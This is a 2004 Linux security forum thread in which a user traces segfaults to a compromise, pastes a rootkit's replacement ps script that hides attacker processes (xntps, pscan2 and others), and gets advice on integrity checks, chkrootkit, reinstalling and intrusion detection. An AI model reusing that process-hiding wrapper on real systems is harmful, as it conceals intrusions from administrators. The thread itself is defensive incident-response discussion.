LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 03-23-2004, 01:50 AM   #1
sakkie
LQ Newbie
 
Registered: Aug 2001
Location: South Africa
Distribution: Slackware 8.0
Posts: 23

Rep: Reputation: 15
segmentation fault


I keep on getting segmentation fault when running commands like ls, df etc...
I am not sure if i am hacked. Does anybody have any idea if this could be caused by somebody hacking me?

Thanks

Sakkie
 
Old 03-23-2004, 03:05 AM   #2
phek
Member
 
Registered: Jul 2001
Location: California, US
Distribution: Slackware
Posts: 196

Rep: Reputation: 30
sure, anything is possible if someone obtains root to your system, but its not likely to be the problem. Sounds like youve got some corrupt/missing lib's (maybe even a bad hd). I would first try strace'ing the process to hopefully figure out why its segfaulting. Maybe its something simple like an unmounted filesystem or something, but its impossible to diagnose knowing of only 1 of the programs that segfaulted (and not even having any details on that one).
 
Old 03-23-2004, 05:06 AM   #3
sakkie
LQ Newbie
 
Registered: Aug 2001
Location: South Africa
Distribution: Slackware 8.0
Posts: 23

Original Poster
Rep: Reputation: 15
I have found the following code in the ps file :

#!/bin/sh
#
# psX by: syg
/bin/.ps $1 $2 $3 $4 $5 $6 $7 $8 $9 > ~/.pstmp
cat ~/.pstmp|egrep -v "xntps|cround|socklist|7350f|sk|a|apach-scan.1|(swapd)|pscan2|/bin/" >> ~/.pstmp1
mv ~/.pstmp1 ~/.pstmp >> /dev/null 2>&1
cat ~/.pstmp
rm -fr ~/.pstmp > /dev/null 2>&1

I am trying to find more information but if anybody knows about the above code please help?

Thanks
 
Old 03-23-2004, 05:42 AM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,311
Blog Entries: 54

Rep: Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860
I am not sure if i am hacked. Does anybody have any idea if this could be caused by somebody hacking me?
Without details this is hard to assess. Some rootkits do fsck up. What you need to do is verify your box' integrity, that is users and processes. Verify running services *are* the services you usually run (netstat -anp), verify your system auth files /etc/{passwd,shadow,group} aren't changed, then verify your system login accounting (wtmp,utmp,acct), log files (check /etc/syslog.conf if unsure which log files). Tell-tale signs could be new setuid root files in locations like /tmp or /var/tmp, dirs whose names start with a dot or "...", system binaries owned by other users, insmod errors at boot time, weird loglines in application logs. Please report anomalies you find.


I keep on getting segmentation fault when running commands like ls, df etc...
Use whatever tools your distro's package manager provides to verify the contents of the packages against a known trusted source like CD's or an FTP mirror. If you've got another box, try compiling Chkrootkit, scp it over and run. Please report anomalies you find.


sure, anything is possible if someone obtains root to your system, but its not likely to be the problem.
IMHO you should refrain from saying "not likely" unless you have a thorough understanding of the situation at hand, system compromise is too grave an issue to be nonchalant about.
 
Old 03-23-2004, 06:14 AM   #5
sakkie
LQ Newbie
 
Registered: Aug 2001
Location: South Africa
Distribution: Slackware 8.0
Posts: 23

Original Poster
Rep: Reputation: 15
As said I founded the code already mentioned in the previous posting. I also used chkrootkid and found shKit rootkit. I gues my only option is to fdisk and redo the machine.

I founded a process xntps which loads at startup.

What would be the best software to monitor any unauthorised access to my server?

Thanks

Isak
 
Old 03-23-2004, 12:45 PM   #6
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,311
Blog Entries: 54

Rep: Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860Reputation: 2860
As said I founded the code already mentioned in the previous posting. I also used chkrootkid and found shKit rootkit. I gues my only option is to fdisk and redo the machine.
Yes, it is.


I founded a process xntps which loads at startup.
Could be a rogue OpenSSH binary providing a backdoor.


What would be the best software to monitor any unauthorised access to my server?
Repartition, reformat, reinstall from scratch, run your filesystem integrity scanner, harden the box. Without this any filesystem integrity scanner (Aide, Samhain, tripwire, choice depends on how many hosts you need to check, how trustworthy you want the databases to be and how comfortable you are with configuration) will be useless. Same goes for intrusion detection systems like Snort, Prelude etc.

Last edited by unSpawn; 03-23-2004 at 12:46 PM.
 
Old 03-23-2004, 01:23 PM   #7
phek
Member
 
Registered: Jul 2001
Location: California, US
Distribution: Slackware
Posts: 196

Rep: Reputation: 30
well if ps was replaced with that code then someone has obtained root access to your machine. Your best bet is to reinstall. If you want to monitor traffic going to that machine though i would suggest doing 1 of 2 things.
1) set up a firewall machine to log all traffic to your machine.
2) put a hub between your machine and whatever your machine is connected to, then put another machine on that hub and sniff the traffic.
 
Old 03-26-2004, 11:10 PM   #8
kdepa
Member
 
Registered: Feb 2004
Posts: 73

Rep: Reputation: 15
I was having LOTS of problems with SegV faults on my slackware system, up until about a month ago. Turns out, my system was overclocked just 20mhz too much. Windows didnt seem to mind, but since linux almost demands perfection, it had SegV faults. I've read that a few AMD processors contain a bug that can cause SegV faults. Also, if your RAM is running at a clockspeed that is too slow, it can drop a bit or two, causing SegV faults.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
what does Segmentation Fault mean ? baronlynx Linux - Newbie 10 10-25-2009 04:32 PM
yast segmentation fault, system freezing - nvidia driver at fault? BaltikaTroika Suse/Novell 2 12-02-2005 09:34 AM
Help !!! Segmentation fault mola Linux - Software 3 06-23-2005 11:13 AM
Segmentation fault tejas15_10 Programming 9 06-20-2005 09:12 AM
Segmentation fault santhosh_o Programming 3 10-26-2004 05:45 AM


All times are GMT -5. The time now is 10:07 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration